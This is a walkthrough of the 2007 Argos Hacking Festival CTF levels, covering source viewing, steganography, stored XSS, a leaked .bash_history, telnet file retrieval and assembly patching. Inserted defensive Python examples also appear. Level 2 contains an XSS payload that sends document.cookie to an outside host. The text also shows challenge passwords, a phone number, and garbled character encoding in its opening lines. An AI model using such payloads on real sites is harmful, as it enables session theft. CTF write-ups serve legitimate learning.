- Argos Hacking Festival 2007 -
2007. 1. 15~16
ģ¤ģģø([email protected])
http://168.188.130.242/ahf2006/ (jhysu)
=================================== Level1
<center>
<a href=http://www.spidynamics.com/assets/documents/HackingFeeds.pdf><img
src=../img/rss.jpg border=0></a><br>
ģ ź·øė¦¼ģ ķ“ė¦ķģė©“ ģ ė¬øģ ė„¼ ė¤ģ“ė°ģ¼ģ¤ ģ ģģµė<font color=#AAAAAA> (PDF)
ė¤.</font><br><br><script>alert('AHF2006 uses a rss feed, just for fun
ģ ė°ķģ½ ģģ ė°ķė ģ·Øģ½ģ ģ ė:D');</script>RSS/ATOM Feed Injection 2006
ė¤ ģ·Øģ½ģ ģ“ ģģ§ ėė¶ė¶ģ ķė”ź·øėØģģ ģ”“ģ¬ķ©ėė¤ ģģ¼ė”.<br>XSS RSS Reader .<br>
이에 대한 주의가 필요하지 않을까싶네요^^<br><iframe src=./rss_password width=0 height=0>
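The Level 1 source above places a script and a zero-size iframe inside text about RSS/ATOM feed injection. As an added example (not part of the original write-up), this Python sketch shows a feed reader treating item text as data: it escapes every field before rendering and flags active markup. The feed, the tag list and the function name are constructed for illustration.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed sample feed (not from the page): one clean item, one carrying the
# kind of markup seen in the Level 1 source (script plus zero-size iframe).
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>demo</title>
<item><title>Release notes</title>
<description>Version 1.2 is out.</description></item>
<item><title>Notice</title>
<description>&lt;script&gt;alert('x');&lt;/script&gt;news&lt;iframe src=./rss_password width=0 height=0&gt;</description></item>
</channel></rss>"""

# Tags and attributes that become active when a reader renders feed text as HTML.
ACTIVE = re.compile(r"<\s*(script|iframe|object|embed)\b|\bon\w+\s*=|javascript:", re.I)

def render_items(feed_xml):
    """Return (safe_html, flagged) per item: text escaped, active markup flagged."""
    out = []
    for item in ET.fromstring(feed_xml).iter("item"):
        title = item.findtext("title", default="")
        desc = item.findtext("description", default="")
        flagged = bool(ACTIVE.search(title) or ACTIVE.search(desc))
        # Escape instead of inserting feed text into the page as markup.
        safe = "<h3>%s</h3><p>%s</p>" % (html.escape(title), html.escape(desc))
        out.append((safe, flagged))
    return out

if __name__ == "__main__":
    for safe, flagged in render_items(SAMPLE_FEED):
        print("FLAGGED" if flagged else "ok     ", safe)
```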
=================================== Level 3
View source.
The default.css file gets downloaded.
========================================== Level8
manlikessexygirl
========================================== Level7
Steganography cipher.....
A pwd.txt file turns up...
010 - 6479 - 6988 call me
Call and you are told the answer....
========================================== Level5
Google badboys and open the URL.
========================================== Level6
View source on any page -> /css/embed.js , ~~.css shows up; request that file on port 80 as shown below.
It is imported like this: import(ahf~~~) .
========================================== Level2
Run an XSS attack against the to.ahf2006 board.
Like this....
Then, when the administrator reads it, the cookie is saved to the path above.
Social_is_best_hacking
# telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
http://168.188.130.242/ahf2006/css/embed.js
<font color=#ffffff><small>축하합니다! level6 정답입니다!</small></font><br><font color=#ffffff><small>패스워드는 HackTheFlashActionScript 입니다.</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>Connection closed by foreign host.
<script language=javascript>
window.open("http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cookie);</script>
========================================== Level4
View source and the path below looks suspicious.. (~admin) ...
http://168.188.130.242/~admin/.bash_history : file paths and file names are leaked
ll
echo "binish is handsome! :p"
vi css/default.css
cd main/
ll
vi head.php
cd ../img
ll
cd ../main/
ll
vi head.php
cd ..
ll
cd ..
ll
cd /usr/local/apache/htdocs/
ll
ll
cd css/
cd ..
ll
cd
ll
cd ahf2006/
ll
d main/
ll
cd main/
vi head.php
ll
mv udcsc.php contact.php
vi hoe
ll
echo "x15kangx is the new face of argos!"
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
wget "http://sexy_site/ya_han_movie.avi"
vi home.php
ll
vi intro.php
vi ../join/join
vi ../join/join.php
vi level.php
vi ../board/board_list.php
vi head.php
vi contact.php
i home.php
vi home.php
vi head.php
ll
vi home.php
vi head.php
ll
vi ../board/board_list.php
vi contact.php
vi ../board/board_list.php
vi head.php
vi level.php
vi re
vi ../join/join.php
exit
x
cd ahf2006/
ll
cd main
ll
vi head.php
ll
vi default.css default.css
vi default.css
vi default.css
ll
cd ..
cd /home/admin/public_html/admin/
vi index.php
vi /usr/local/apache/conf/httpd.conf
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart
ll
cd main
ll
vi intro.php
vi intro.php
ll
vi member.php
ll
cd ..
The red text above is the part to look at closely....
ll
vi member.
vi member.php
ll
cd join
ll
cd ..
ll
cd css
vi default.css
ll
cd ..
ll
vi main/home.php
cd css/
ll
vi default.css
ll
cd ..
cd ..
ll
ll
cd ../dhf2006/
ll
vi main/home.php
vi main/head.php
cd
cd ahf2006/
ll
vi css/default.css
ll
pwd
cd ..
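Level 4 works because a dotfile under the ~admin user directory was served over HTTP. As an added example (not part of the original write-up), the Python below scans access-log lines for requests that name a dot-prefixed file and marks the ones the server actually returned. The log lines, addresses, allow-list and function name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jan/2007:10:01:02 +0900] "GET /ahf2006/ HTTP/1.1" 200 5120
192.0.2.10 - - [15/Jan/2007:10:03:40 +0900] "GET /~admin/.bash_history HTTP/1.1" 200 2381
192.0.2.44 - - [15/Jan/2007:10:05:11 +0900] "GET /~admin/.htpasswd HTTP/1.1" 403 210
192.0.2.44 - - [15/Jan/2007:10:06:00 +0900] "GET /ahf2006/css/default.css HTTP/1.1" 200 900
192.0.2.77 - - [15/Jan/2007:10:07:30 +0900] "GET /~admin/%2Ebash_history HTTP/1.1" 200 2381
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
ALLOWED = {".well-known"}  # dot-directory that is meant to be public

def dotfile_hits(log_text):
    """Return (client, decoded_path, served) for requests that name a dotfile."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        # Drop the query string and decode %2E so an encoded dot is still caught.
        path = unquote(target.split("?", 1)[0])
        names = [s for s in path.split("/") if s.startswith(".") and s not in (".", "..")]
        if any(n not in ALLOWED for n in names):
            # A 2xx status means the file content was actually returned.
            hits.append((client, path, status.startswith("2")))
    return hits

if __name__ == "__main__":
    for client, path, served in dotfile_hits(SAMPLE_LOG):
        print("SERVED " if served else "blocked", client, path)
```

Any hit marked as served is a file whose contents left the server, so it should be treated as disclosed.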
=================================================Level9
A reversing problem: find the sum of 2006 numbers.
004066F6 . 8D7424 20 LEA ESI,DWORD PTR SS:[ESP+20]
004066FA > 8B2E MOV EBP,DWORD PTR DS:[ESI]
004066FC . 03FD ADD EDI,EBP ; store the sum in edi
004066FE . 40 INC EAX
004066FF . 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00406703 . 50 PUSH EAX
00406704 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00406708 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040670D . 50 PUSH EAX
0040670E . E8 87430100 CALL AHF2006.0041AA9A
00406713 . 83C4 0C ADD ESP,0C
00406716 . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040671A . 68 70014300 PUSH AHF2006.00430170 ; 번째 값 :
0040671F . E8 14930100 CALL AHF2006.0041FA38
00406724 55 PUSH EBP ; push edi (print the sum)
00406725 . 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00406729 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040672E . 51 PUSH ECX
0040672F . E8 66430100 CALL AHF2006.0041AA9A
00406734 . 83C4 0C ADD ESP,0C
00406737 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040673B . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040673F . 52 PUSH EDX
00406740 . E8 1A930100 CALL AHF2006.0041FA5F
00406745 . 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
00406749 . 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
0040674D . 53 PUSH EBX
0040674E . 53 PUSH EBX
0040674F . 50 PUSH EAX
00406750 E8 B67A0100 CALL AHF2006.0041E20B
00406755 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
00406759 83C6 04 ADD ESI,4
0040675C 3D D6070000 CMP EAX,7D6
00406761 ^ 7C 97 JL SHORT AHF2006.004066FA
00406763 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00406767 . 889C24 801F00>MOV BYTE PTR SS:[ESP+1F80],BL
Patch the push ebp above to push edi, save, and then run the program; the accumulated sums are printed.
Hold down Enter and the sum of the 2006 values is soon printed.
Alternatively, set a breakpoint on the lower part in the debugger and let execution continue; the sum will be stored in the edi register.
99366